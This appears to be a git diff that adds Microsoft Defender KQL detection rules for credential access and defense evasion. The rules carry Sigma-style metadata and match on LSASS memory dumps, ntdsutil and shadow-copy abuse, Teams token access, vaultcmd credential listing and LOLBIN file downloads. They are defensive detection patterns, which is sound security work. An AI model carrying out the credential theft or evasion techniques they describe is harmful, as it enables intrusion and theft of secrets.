"MiniDump"))) and (not((InitiatingProcessFolderPath contains ":\\Packages\\Plugins\\Microsoft.GuestConfiguration.ConfigurationforWindows\\" or (ProcessCommandLine contains " -ma " and (FolderPath contains ":\\Program Files (x86)\\Java\\" or FolderPath contains ":\\Program Files\\Java\\") and FolderPath endswith "\\bin\\jp2launcher.exe" and (InitiatingProcessFolderPath contains ":\\Program Files (x86)\\Java\\" or InitiatingProcessFolderPath contains ":\\Program Files\\Java\\") and InitiatingProcessFolderPath endswith "\\bin\\javaws.exe") or (ProcessCommandLine contains "ping" and ProcessCommandLine contains "127.0.0.1" and ProcessCommandLine contains " -n ") or (FolderPath endswith "\\PING.EXE" and InitiatingProcessCommandLine contains "\\DismFoDInstall.cmd")))) \ No newline at end of file diff --git a/KQL/rules/Credential Access/suspicious_sysvol_domain_group_policy_access.kql b/KQL/rules/Credential Access/suspicious_sysvol_domain_group_policy_access.kql new file mode 100644 index 00000000..a5a219a1 --- /dev/null +++ b/KQL/rules/Credential Access/suspicious_sysvol_domain_group_policy_access.kql @@ -0,0 +1,12 @@ +// Title: Suspicious SYSVOL Domain Group Policy Access +// Author: Markus Neis, Jonhnathan Ribeiro, oscd.community +// Date: 2018-04-09 +// Level: medium +// Description: Detects Access to Domain Group Policies stored in SYSVOL +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1552.006 +// False Positives: +// - Administrative activity + +DeviceProcessEvents +| where ProcessCommandLine contains "\\SYSVOL\\" and ProcessCommandLine contains "\\policies\\" \ No newline at end of file diff --git a/KQL/rules/Credential Access/suspicious_teams_application_related_objectacess_event.kql b/KQL/rules/Credential Access/suspicious_teams_application_related_objectacess_event.kql new file mode 100644 index 00000000..b745ddf8 --- /dev/null +++ b/KQL/rules/Credential Access/suspicious_teams_application_related_objectacess_event.kql @@ -0,0 +1,10 @@ +// Title: Suspicious Teams Application Related ObjectAcess Event +// Author: @SerkinValery +// Date: 2022-09-16 +// Level: high +// Description: Detects an access to authentication tokens and accounts of Microsoft Teams desktop application. +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1528 + +DeviceRegistryEvents +| where (RegistryKey contains "\\Microsoft\\Teams\\Cookies" or RegistryKey contains "\\Microsoft\\Teams\\Local Storage\\leveldb") and (not(InitiatingProcessFolderPath contains "\\Microsoft\\Teams\\current\\Teams.exe")) \ No newline at end of file diff --git a/KQL/rules/Credential Access/suspicious_usage_of_active_directory_diagnostic_tool_ntdsutil_exe_.kql b/KQL/rules/Credential Access/suspicious_usage_of_active_directory_diagnostic_tool_ntdsutil_exe_.kql new file mode 100644 index 00000000..5a63271a --- /dev/null +++ b/KQL/rules/Credential Access/suspicious_usage_of_active_directory_diagnostic_tool_ntdsutil_exe_.kql @@ -0,0 +1,13 @@ +// Title: Suspicious Usage Of Active Directory Diagnostic Tool (ntdsutil.exe) +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-09-14 +// Level: medium +// Description: Detects execution of ntdsutil.exe to perform different actions such as restoring snapshots...etc. +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003.003 +// False Positives: +// - Legitimate usage to restore snapshots +// - Legitimate admin activity + +DeviceProcessEvents +| where ((ProcessCommandLine contains "snapshot" and ProcessCommandLine contains "mount ") or (ProcessCommandLine contains "ac" and ProcessCommandLine contains " i" and ProcessCommandLine contains " ntds")) and (FolderPath endswith "\\ntdsutil.exe" or ProcessVersionInfoOriginalFileName =~ "ntdsutil.exe") \ No newline at end of file diff --git a/KQL/rules/Credential Access/volumeshadowcopy_symlink_creation_via_mklink.kql b/KQL/rules/Credential Access/volumeshadowcopy_symlink_creation_via_mklink.kql new file mode 100644 index 00000000..0f3e9379 --- /dev/null +++ b/KQL/rules/Credential Access/volumeshadowcopy_symlink_creation_via_mklink.kql @@ -0,0 +1,12 @@ +// Title: VolumeShadowCopy Symlink Creation Via Mklink +// Author: Teymur Kheirkhabarov, oscd.community +// Date: 2019-10-22 +// Level: high +// Description: Shadow Copies storage symbolic link creation using operating systems utilities +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003.002, attack.t1003.003 +// False Positives: +// - Legitimate administrator working with shadow copies, access for backup purposes + +DeviceProcessEvents +| where ProcessCommandLine contains "mklink" and ProcessCommandLine contains "HarddiskVolumeShadowCopy" \ No newline at end of file diff --git a/KQL/rules/Credential Access/wce_wceaux_dll_access.kql b/KQL/rules/Credential Access/wce_wceaux_dll_access.kql new file mode 100644 index 00000000..a0776d36 --- /dev/null +++ b/KQL/rules/Credential Access/wce_wceaux_dll_access.kql @@ -0,0 +1,10 @@ +// Title: WCE wceaux.dll Access +// Author: Thomas Patzke +// Date: 2017-06-14 +// Level: critical +// Description: Detects wceaux.dll access while WCE pass-the-hash remote command execution on source host +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003, attack.s0005 + +DeviceRegistryEvents +| where RegistryKey endswith "\\wceaux.dll" \ No newline at end of file diff --git a/KQL/rules/Credential Access/werfault_lsass_process_memory_dump.kql b/KQL/rules/Credential Access/werfault_lsass_process_memory_dump.kql new file mode 100644 index 00000000..00e03537 --- /dev/null +++ b/KQL/rules/Credential Access/werfault_lsass_process_memory_dump.kql @@ -0,0 +1,10 @@ +// Title: WerFault LSASS Process Memory Dump +// Author: Florian Roth (Nextron Systems) +// Date: 2022-06-27 +// Level: high +// Description: Detects WerFault creating a dump file with a name that indicates that the dump file could be an LSASS process memory, which contains user credentials +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003.001 + +DeviceFileEvents +| where InitiatingProcessFolderPath =~ "C:\\WINDOWS\\system32\\WerFault.exe" and (FolderPath contains "\\lsass" or FolderPath contains "lsass.exe") \ No newline at end of file diff --git a/KQL/rules/Credential Access/windows_credential_editor_registry.kql b/KQL/rules/Credential Access/windows_credential_editor_registry.kql new file mode 100644 index 00000000..394f6e39 --- /dev/null +++ b/KQL/rules/Credential Access/windows_credential_editor_registry.kql @@ -0,0 +1,10 @@ +// Title: Windows Credential Editor Registry +// Author: Florian Roth (Nextron Systems) +// Date: 2019-12-31 +// Level: critical +// Description: Detects the use of Windows Credential Editor (WCE) +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003.001, attack.s0005 + +DeviceRegistryEvents +| where RegistryKey contains "Services\\WCESERVICE\\Start" \ No newline at end of file diff --git a/KQL/rules/Credential Access/windows_credential_manager_access_via_vaultcmd.kql b/KQL/rules/Credential Access/windows_credential_manager_access_via_vaultcmd.kql new file mode 100644 index 00000000..86a64afd --- /dev/null +++ b/KQL/rules/Credential Access/windows_credential_manager_access_via_vaultcmd.kql @@ -0,0 +1,10 @@ +// Title: Windows Credential Manager Access via VaultCmd +// Author: frack113 +// Date: 2022-04-08 +// Level: medium +// Description: List credentials currently stored in Windows Credential Manager via the native Windows utility vaultcmd.exe +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1555.004 + +DeviceProcessEvents +| where ProcessCommandLine contains "/listcreds:" and (FolderPath endswith "\\VaultCmd.exe" or ProcessVersionInfoOriginalFileName =~ "VAULTCMD.EXE") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/_rdp_file_created_by_uncommon_application.kql b/KQL/rules/Defense Evasion/_rdp_file_created_by_uncommon_application.kql new file mode 100644 index 00000000..fae1af62 --- /dev/null +++ b/KQL/rules/Defense Evasion/_rdp_file_created_by_uncommon_application.kql @@ -0,0 +1,11 @@ +// Title: .RDP File Created By Uncommon Application +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-04-18 +// Level: high +// Description: Detects creation of a file with an ".rdp" extension by an application that doesn't commonly create such files. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion + +DeviceFileEvents +| where (InitiatingProcessFolderPath endswith "\\brave.exe" or InitiatingProcessFolderPath endswith "\\CCleaner Browser\\Application\\CCleanerBrowser.exe" or InitiatingProcessFolderPath endswith "\\chromium.exe" or InitiatingProcessFolderPath endswith "\\firefox.exe" or InitiatingProcessFolderPath endswith "\\Google\\Chrome\\Application\\chrome.exe" or InitiatingProcessFolderPath endswith "\\iexplore.exe" or InitiatingProcessFolderPath endswith "\\microsoftedge.exe" or InitiatingProcessFolderPath endswith "\\msedge.exe" or InitiatingProcessFolderPath endswith "\\Opera.exe" or InitiatingProcessFolderPath endswith "\\Vivaldi.exe" or InitiatingProcessFolderPath endswith "\\Whale.exe" or InitiatingProcessFolderPath endswith "\\olk.exe" or InitiatingProcessFolderPath endswith "\\Outlook.exe" or InitiatingProcessFolderPath endswith "\\RuntimeBroker.exe" or InitiatingProcessFolderPath endswith "\\Thunderbird.exe" or InitiatingProcessFolderPath endswith "\\Discord.exe" or InitiatingProcessFolderPath endswith "\\Keybase.exe" or InitiatingProcessFolderPath endswith "\\msteams.exe" or InitiatingProcessFolderPath endswith "\\Slack.exe" or InitiatingProcessFolderPath endswith "\\teams.exe") and FolderPath endswith ".rdp" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/abused_debug_privilege_by_arbitrary_parent_processes.kql b/KQL/rules/Defense Evasion/abused_debug_privilege_by_arbitrary_parent_processes.kql new file mode 100644 index 00000000..ab1041ea --- /dev/null +++ b/KQL/rules/Defense Evasion/abused_debug_privilege_by_arbitrary_parent_processes.kql @@ -0,0 +1,10 @@ +// Title: Abused Debug Privilege by Arbitrary Parent Processes +// Author: Semanur Guneysu @semanurtg, oscd.community +// Date: 2020-10-28 +// Level: high +// Description: Detection of unusual child processes by different system processes +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548 + +DeviceProcessEvents +| where (((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\cmd.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll", "Cmd.Exe"))) and ((InitiatingProcessFolderPath endswith "\\winlogon.exe" or InitiatingProcessFolderPath endswith "\\services.exe" or InitiatingProcessFolderPath endswith "\\lsass.exe" or InitiatingProcessFolderPath endswith "\\csrss.exe" or InitiatingProcessFolderPath endswith "\\smss.exe" or InitiatingProcessFolderPath endswith "\\wininit.exe" or InitiatingProcessFolderPath endswith "\\spoolsv.exe" or InitiatingProcessFolderPath endswith "\\searchindexer.exe") and (AccountName contains "AUTHORI" or AccountName contains "AUTORI"))) and (not((ProcessCommandLine contains " route " and ProcessCommandLine contains " ADD "))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/abusing_print_executable.kql b/KQL/rules/Defense Evasion/abusing_print_executable.kql new file mode 100644 index 00000000..c16b9ebe --- /dev/null +++ b/KQL/rules/Defense Evasion/abusing_print_executable.kql @@ -0,0 +1,10 @@ +// Title: Abusing Print Executable +// Author: Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative +// Date: 2020-10-05 +// Level: medium +// Description: Attackers can use print.exe for remote file copy +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 + +DeviceProcessEvents +| where ((ProcessCommandLine contains "/D" and ProcessCommandLine contains ".exe") and ProcessCommandLine startswith "print" and FolderPath endswith "\\print.exe") and (not(ProcessCommandLine contains "print.exe")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/add_insecure_download_source_to_winget.kql b/KQL/rules/Defense Evasion/add_insecure_download_source_to_winget.kql new file mode 100644 index 00000000..a3af7520 --- /dev/null +++ b/KQL/rules/Defense Evasion/add_insecure_download_source_to_winget.kql @@ -0,0 +1,14 @@ +// Title: Add Insecure Download Source To Winget +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-04-17 +// Level: high +// Description: Detects usage of winget to add a new insecure (http) download source. +Winget will not allow the addition of insecure sources, hence this could indicate potential suspicious activity (or typos) + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.t1059 +// False Positives: +// - False positives might occur if the users are unaware of such control checks + +DeviceProcessEvents +| where (ProcessCommandLine contains "source " and ProcessCommandLine contains "add " and ProcessCommandLine contains "http://") and (FolderPath endswith "\\winget.exe" or ProcessVersionInfoOriginalFileName =~ "winget.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/add_new_download_source_to_winget.kql b/KQL/rules/Defense Evasion/add_new_download_source_to_winget.kql new file mode 100644 index 00000000..ee5872f8 --- /dev/null +++ b/KQL/rules/Defense Evasion/add_new_download_source_to_winget.kql @@ -0,0 +1,12 @@ +// Title: Add New Download Source To Winget +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-04-17 +// Level: medium +// Description: Detects usage of winget to add new additional download sources +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.t1059 +// False Positives: +// - False positive are expected with legitimate sources + +DeviceProcessEvents +| where (ProcessCommandLine contains "source " and ProcessCommandLine contains "add ") and (FolderPath endswith "\\winget.exe" or ProcessVersionInfoOriginalFileName =~ "winget.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/add_potential_suspicious_new_download_source_to_winget.kql b/KQL/rules/Defense Evasion/add_potential_suspicious_new_download_source_to_winget.kql new file mode 100644 index 00000000..a18d27f0 --- /dev/null +++ b/KQL/rules/Defense Evasion/add_potential_suspicious_new_download_source_to_winget.kql @@ -0,0 +1,10 @@ +// Title: Add Potential Suspicious New Download Source To Winget +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-04-17 +// Level: medium +// Description: Detects usage of winget to add new potentially suspicious download sources +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.t1059 + +DeviceProcessEvents +| where (ProcessCommandLine contains "source " and ProcessCommandLine contains "add ") and (FolderPath endswith "\\winget.exe" or ProcessVersionInfoOriginalFileName =~ "winget.exe") and ProcessCommandLine matches regex "://\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/add_safeboot_keys_via_reg_utility.kql b/KQL/rules/Defense Evasion/add_safeboot_keys_via_reg_utility.kql new file mode 100644 index 00000000..548ac8af --- /dev/null +++ b/KQL/rules/Defense Evasion/add_safeboot_keys_via_reg_utility.kql @@ -0,0 +1,12 @@ +// Title: Add SafeBoot Keys Via Reg Utility +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-09-02 +// Level: high +// Description: Detects execution of "reg.exe" commands with the "add" or "copy" flags on safe boot registry keys. Often used by attacker to allow the ransomware to work in safe mode as some security products do not +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (ProcessCommandLine contains " copy " or ProcessCommandLine contains " add ") and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe") and ProcessCommandLine contains "\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/addinutil_exe_execution_from_uncommon_directory.kql b/KQL/rules/Defense Evasion/addinutil_exe_execution_from_uncommon_directory.kql new file mode 100644 index 00000000..1c181326 --- /dev/null +++ b/KQL/rules/Defense Evasion/addinutil_exe_execution_from_uncommon_directory.kql @@ -0,0 +1,10 @@ +// Title: AddinUtil.EXE Execution From Uncommon Directory +// Author: Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri) +// Date: 2023-09-18 +// Level: medium +// Description: Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) from a non-standard directory. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 + +DeviceProcessEvents +| where (FolderPath endswith "\\addinutil.exe" or ProcessVersionInfoOriginalFileName =~ "AddInUtil.exe") and (not((FolderPath contains ":\\Windows\\Microsoft.NET\\Framework\\" or FolderPath contains ":\\Windows\\Microsoft.NET\\Framework64\\" or FolderPath contains ":\\Windows\\Microsoft.NET\\FrameworkArm\\" or FolderPath contains ":\\Windows\\Microsoft.NET\\FrameworkArm64\\" or FolderPath contains ":\\Windows\\WinSxS\\"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/ads_zone_identifier_deleted_by_uncommon_application.kql b/KQL/rules/Defense Evasion/ads_zone_identifier_deleted_by_uncommon_application.kql new file mode 100644 index 00000000..d0c05759 --- /dev/null +++ b/KQL/rules/Defense Evasion/ads_zone_identifier_deleted_by_uncommon_application.kql @@ -0,0 +1,12 @@ +// Title: ADS Zone.Identifier Deleted By Uncommon Application +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-09-04 +// Level: medium +// Description: Detects the deletion of the "Zone.Identifier" ADS by an uncommon process. Attackers can leverage this in order to bypass security restrictions that make use of the ADS such as Microsoft Office apps. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1070.004 +// False Positives: +// - Other third party applications not listed. + +DeviceFileEvents +| where FolderPath endswith ":Zone.Identifier" and (not((InitiatingProcessFolderPath in~ ("C:\\Program Files\\PowerShell\\7-preview\\pwsh.exe", "C:\\Program Files\\PowerShell\\7\\pwsh.exe", "C:\\Windows\\explorer.exe", "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "C:\\Windows\\SysWOW64\\explorer.exe", "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe")))) and (not(((InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe", "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe", "C:\\Program Files\\Mozilla Firefox\\firefox.exe")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", "C:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe"))))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/agentexecutor_powershell_execution.kql b/KQL/rules/Defense Evasion/agentexecutor_powershell_execution.kql new file mode 100644 index 00000000..408b1e6b --- /dev/null +++ b/KQL/rules/Defense Evasion/agentexecutor_powershell_execution.kql @@ -0,0 +1,12 @@ +// Title: AgentExecutor PowerShell Execution +// Author: Nasreddine Bencherchali (Nextron Systems), memory-shards +// Date: 2022-12-24 +// Level: medium +// Description: Detects execution of the AgentExecutor.exe binary. Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy "Bypass" or any binary named "powershell.exe" located in the path provided by 6th positional argument +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 +// False Positives: +// - Legitimate use via Intune management. You exclude script paths and names to reduce FP rate + +DeviceProcessEvents +| where ((ProcessCommandLine contains " -powershell" or ProcessCommandLine contains " -remediationScript") and (FolderPath =~ "\\AgentExecutor.exe" or ProcessVersionInfoOriginalFileName =~ "AgentExecutor.exe")) and (not(InitiatingProcessFolderPath endswith "\\Microsoft.Management.Services.IntuneWindowsAgent.exe")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/always_install_elevated_msi_spawned_cmd_and_powershell.kql b/KQL/rules/Defense Evasion/always_install_elevated_msi_spawned_cmd_and_powershell.kql new file mode 100644 index 00000000..69e25b00 --- /dev/null +++ b/KQL/rules/Defense Evasion/always_install_elevated_msi_spawned_cmd_and_powershell.kql @@ -0,0 +1,10 @@ +// Title: Always Install Elevated MSI Spawned Cmd And Powershell +// Author: Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community +// Date: 2020-10-13 +// Level: medium +// Description: Detects Windows Installer service (msiexec.exe) spawning "cmd" or "powershell" +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002 + +DeviceProcessEvents +| where ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "PowerShell.EXE", "pwsh.dll"))) and ((InitiatingProcessFolderPath contains "\\Windows\\Installer\\" and InitiatingProcessFolderPath contains "msi") and InitiatingProcessFolderPath endswith "tmp") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/always_install_elevated_windows_installer.kql b/KQL/rules/Defense Evasion/always_install_elevated_windows_installer.kql new file mode 100644 index 00000000..d620caf0 --- /dev/null +++ b/KQL/rules/Defense Evasion/always_install_elevated_windows_installer.kql @@ -0,0 +1,14 @@ +// Title: Always Install Elevated Windows Installer +// Author: Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community +// Date: 2020-10-13 +// Level: medium +// Description: Detects Windows Installer service (msiexec.exe) trying to install MSI packages with SYSTEM privilege +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002 +// False Positives: +// - System administrator usage +// - Anti virus products +// - WindowsApps located in "C:\Program Files\WindowsApps\" + +DeviceProcessEvents +| where (((FolderPath contains "\\Windows\\Installer\\" and FolderPath contains "msi") and FolderPath endswith "tmp") or (FolderPath endswith "\\msiexec.exe" and (ProcessIntegrityLevel in~ ("System", "S-1-16-16384")))) and (AccountName contains "AUTHORI" or AccountName contains "AUTORI") and (not(((InitiatingProcessFolderPath startswith "C:\\Program Files\\Avast Software\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Avast Software\\") or InitiatingProcessFolderPath startswith "C:\\ProgramData\\Avira\\" or (InitiatingProcessFolderPath startswith "C:\\Program Files\\Google\\Update\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Google\\Update\\") or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\services.exe" or (ProcessCommandLine endswith "\\system32\\msiexec.exe /V" or InitiatingProcessCommandLine endswith "\\system32\\msiexec.exe /V") or InitiatingProcessFolderPath startswith "C:\\ProgramData\\Sophos\\"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/amsi_dll_loaded_via_lolbin_process.kql b/KQL/rules/Defense Evasion/amsi_dll_loaded_via_lolbin_process.kql new file mode 100644 index 00000000..e1bcca0c --- /dev/null +++ b/KQL/rules/Defense Evasion/amsi_dll_loaded_via_lolbin_process.kql @@ -0,0 +1,10 @@ +// Title: Amsi.DLL Loaded Via LOLBIN Process +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-06-01 +// Level: medium +// Description: Detects loading of "Amsi.dll" by a living of the land process. This could be an indication of a "PowerShell without PowerShell" attack +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion + +DeviceImageLoadEvents +| where FolderPath endswith "\\amsi.dll" and (InitiatingProcessFolderPath endswith "\\ExtExport.exe" or InitiatingProcessFolderPath endswith "\\odbcconf.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/antivirus_filter_driver_disallowed_on_dev_drive_registry.kql b/KQL/rules/Defense Evasion/antivirus_filter_driver_disallowed_on_dev_drive_registry.kql new file mode 100644 index 00000000..b2d5e948 --- /dev/null +++ b/KQL/rules/Defense Evasion/antivirus_filter_driver_disallowed_on_dev_drive_registry.kql @@ -0,0 +1,13 @@ +// Title: Antivirus Filter Driver Disallowed On Dev Drive - Registry +// Author: @kostastsale, Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-11-05 +// Level: high +// Description: Detects activity that indicates a user disabling the ability for Antivirus mini filter to inspect a "Dev Drive". + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Unlikely + +DeviceRegistryEvents +| where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey endswith "\\FilterManager\\FltmgrDevDriveAllowAntivirusFilter" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/arbitrary_dll_or_csproj_code_execution_via_dotnet_exe.kql b/KQL/rules/Defense Evasion/arbitrary_dll_or_csproj_code_execution_via_dotnet_exe.kql new file mode 100644 index 00000000..5492f416 --- /dev/null +++ b/KQL/rules/Defense Evasion/arbitrary_dll_or_csproj_code_execution_via_dotnet_exe.kql @@ -0,0 +1,12 @@ +// Title: Arbitrary DLL or Csproj Code Execution Via Dotnet.EXE +// Author: Beyu Denis, oscd.community +// Date: 2020-10-18 +// Level: medium +// Description: Detects execution of arbitrary DLLs or unsigned code via a ".csproj" files via Dotnet.EXE. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 +// False Positives: +// - Legitimate administrator usage + +DeviceProcessEvents +| where ((ProcessCommandLine endswith ".csproj" or ProcessCommandLine endswith ".csproj\"" or ProcessCommandLine endswith ".dll" or ProcessCommandLine endswith ".dll\"" or ProcessCommandLine endswith ".csproj'" or ProcessCommandLine endswith ".dll'") and (FolderPath endswith "\\dotnet.exe" or ProcessVersionInfoOriginalFileName =~ ".NET Host")) and (not(((ProcessCommandLine contains "C:\\ProgramData\\CSScriptNpp\\" and ProcessCommandLine contains "-cscs_path:" and ProcessCommandLine contains "\\cs-script\\cscs.dll") and (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Notepad++\\notepad++.exe", "C:\\Program Files\\Notepad++\\notepad++.exe"))))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/arbitrary_file_download_via_imewdbld_exe.kql b/KQL/rules/Defense Evasion/arbitrary_file_download_via_imewdbld_exe.kql new file mode 100644 index 00000000..7ad1a4e9 --- /dev/null +++ b/KQL/rules/Defense Evasion/arbitrary_file_download_via_imewdbld_exe.kql @@ -0,0 +1,10 @@ +// Title: Arbitrary File Download Via IMEWDBLD.EXE +// Author: Swachchhanda Shrawan Poudel +// Date: 2023-11-09 +// Level: high +// Description: Detects usage of "IMEWDBLD.exe" to download arbitrary files +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.t1218 + +DeviceProcessEvents +| where (ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://") and (FolderPath endswith "\\IMEWDBLD.exe" or ProcessVersionInfoOriginalFileName =~ "imewdbld.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/arbitrary_file_download_via_msedge_proxy_exe.kql b/KQL/rules/Defense Evasion/arbitrary_file_download_via_msedge_proxy_exe.kql new file mode 100644 index 00000000..d60733b3 --- /dev/null +++ b/KQL/rules/Defense Evasion/arbitrary_file_download_via_msedge_proxy_exe.kql @@ -0,0 +1,10 @@ +// Title: Arbitrary File Download Via MSEDGE_PROXY.EXE +// Author: Swachchhanda Shrawan Poudel +// Date: 2023-11-09 +// Level: medium +// Description: Detects usage of "msedge_proxy.exe" to download arbitrary files +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.t1218 + +DeviceProcessEvents +| where (ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://") and (FolderPath endswith "\\msedge_proxy.exe" or ProcessVersionInfoOriginalFileName =~ "msedge_proxy.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/arbitrary_file_download_via_msohtmed_exe.kql b/KQL/rules/Defense Evasion/arbitrary_file_download_via_msohtmed_exe.kql new file mode 100644 index 00000000..13bfc92f --- /dev/null +++ b/KQL/rules/Defense Evasion/arbitrary_file_download_via_msohtmed_exe.kql @@ -0,0 +1,10 @@ +// Title: Arbitrary File Download Via MSOHTMED.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-19 +// Level: medium +// Description: Detects usage of "MSOHTMED" to download arbitrary files +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.t1218 + +DeviceProcessEvents +| where (ProcessCommandLine contains "ftp://" or ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://") and (FolderPath endswith "\\MSOHTMED.exe" or ProcessVersionInfoOriginalFileName =~ "MsoHtmEd.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/arbitrary_file_download_via_mspub_exe.kql b/KQL/rules/Defense Evasion/arbitrary_file_download_via_mspub_exe.kql new file mode 100644 index 00000000..0c4f3350 --- /dev/null +++ b/KQL/rules/Defense Evasion/arbitrary_file_download_via_mspub_exe.kql @@ -0,0 +1,10 @@ +// Title: Arbitrary File Download Via MSPUB.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-19 +// Level: medium +// Description: Detects usage of "MSPUB" (Microsoft Publisher) to download arbitrary files +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.t1218 + +DeviceProcessEvents +| where (ProcessCommandLine contains "ftp://" or ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://") and (FolderPath endswith "\\MSPUB.exe" or ProcessVersionInfoOriginalFileName =~ "MSPUB.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/arbitrary_file_download_via_presentationhost_exe.kql b/KQL/rules/Defense Evasion/arbitrary_file_download_via_presentationhost_exe.kql new file mode 100644 index 00000000..bf1c0eb9 --- /dev/null +++ b/KQL/rules/Defense Evasion/arbitrary_file_download_via_presentationhost_exe.kql @@ -0,0 +1,10 @@ +// Title: Arbitrary File Download Via PresentationHost.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-19 +// Level: medium +// Description: Detects usage of "PresentationHost" which is a utility that runs ".xbap" (Browser Applications) files to download arbitrary files +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.t1218 + +DeviceProcessEvents +| where (ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://" or ProcessCommandLine contains "ftp://") and (FolderPath endswith "\\presentationhost.exe" or ProcessVersionInfoOriginalFileName =~ "PresentationHost.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/arbitrary_file_download_via_squirrel_exe.kql b/KQL/rules/Defense Evasion/arbitrary_file_download_via_squirrel_exe.kql new file mode 100644 index 00000000..381c132f --- 